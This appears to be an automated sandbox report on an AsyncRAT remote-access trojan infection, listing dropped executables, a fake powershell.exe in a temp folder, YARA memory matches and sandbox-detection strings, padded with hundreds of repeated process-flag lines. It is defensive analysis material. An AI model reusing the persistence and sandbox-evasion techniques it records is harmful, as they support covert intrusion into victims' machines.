Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0337BE80 push es; ret 14_2_0337BE96
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 14_2_0337BEC2 push es; ret 14_2_0337BED6
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 17_2_00EBC5E0 push es; ret 17_2_00EBC5F0
Source: C:\Users\user\AppData\Local\Temp\o.exe | Code function: 17_2_00EBD9E0 push es; ret 17_2_00EBD9F0
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_007A07D8 push es; ret 32_2_007A0C96
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_072375E8 push E803B477h; iretd 32_2_072375ED
Source: C:\Users\user\AppData\Roaming\vc.exe | Code function: 32_2_07237A05 push eax; ret 32_2_07237A06
Source: initial sample | Static PE information: section name: .text entropy: 7.71178527327

      Persistence and Installation Behavior:

Drops PE files to the document folder of the user
Source: C:\Users\user\AppData\Local\Temp\o.exe | File created: C:\Users\user\Documents\vc.exe
Source: C:\Windows\SysWOW64\Robocopy.exe | File created: C:\Users\user\AppData\Local\Temp\powershell.exe

      Boot Survival:

Yara detected AsyncRAT
Source: Yara match | File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\o.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\Robocopy.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\Robocopy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\timeout.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\o.exe Process information set: NOOPENFILEERRORBOX (77 identical entries collapsed)
Source: C:\Users\user\AppData\Roaming\vc.exe Process information set: NOOPENFILEERRORBOX (47 identical entries collapsed)

Malware Analysis System Evasion:

Yara detected AsyncRAT
Source: Yara match File source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vc.exe PID: 4896, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vc.exe, 00000020.00000002.529207306.0000000003B41000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLHEAD
